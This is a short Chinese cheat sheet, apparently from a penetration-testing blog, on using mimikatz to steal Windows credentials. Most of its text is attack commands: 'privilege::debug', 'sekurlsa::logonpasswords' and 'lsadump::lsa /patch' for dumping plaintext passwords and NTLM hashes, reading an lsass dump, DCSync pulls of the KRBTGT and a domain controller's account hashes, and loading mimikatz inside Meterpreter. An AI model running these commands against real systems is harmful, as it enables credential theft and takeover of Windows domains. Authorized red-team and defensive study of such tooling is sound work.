mimikatz使用

mimikatz使用时需要高权限,至少是administrator权限
mimikatz抓取密码的命令需要system权限,可以先进行提权

privilege::debug  //提升权限(从administrator提升到system)

抓取hash

sekurlsa::logonpasswords   //获取当前在线用户的明文密码(需要高权限运行)
lsadump::lsa /patch   //获取当前此计算机存在过用户的NTLMHASH

mimikatz的其他命令

lsadump::sam SYSTEM.hiv //导出所有用户口令 使用Volue Shadow Copy获得SYSTEM、SAM备份
通过内存文件获取口令
sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full
拉取 rd.adsecurity.org 域中的 KRBTGT 用户帐户的密码数据
lsadump::dcsync /domain:rd.adsecurity.org /user:krbtgt
拉取 lab.adsecurity.org 域中 ADSDC03 域控制器的计算机帐户的密码数据
lsadump::dcsync /domain:lab.adsecurity.org /user:adsdc03$

msf使用mimikatz
在meterpreter中加载mimikatz模块

load mimikatz

然后help,查看参数信息

kerberos          Attempt to retrieve kerberos creds
livessp           Attempt to retrieve livessp creds
mimikatz_command  Run a custom command
msv               Attempt to retrieve msv creds (hashes)
ssp               Attempt to retrieve ssp creds
tspkg             Attempt to retrieve tspkg creds
wdigest           Attempt to retrieve wdigest creds

常用命令为kerberos和msv

你可能感兴趣的:(内网渗透)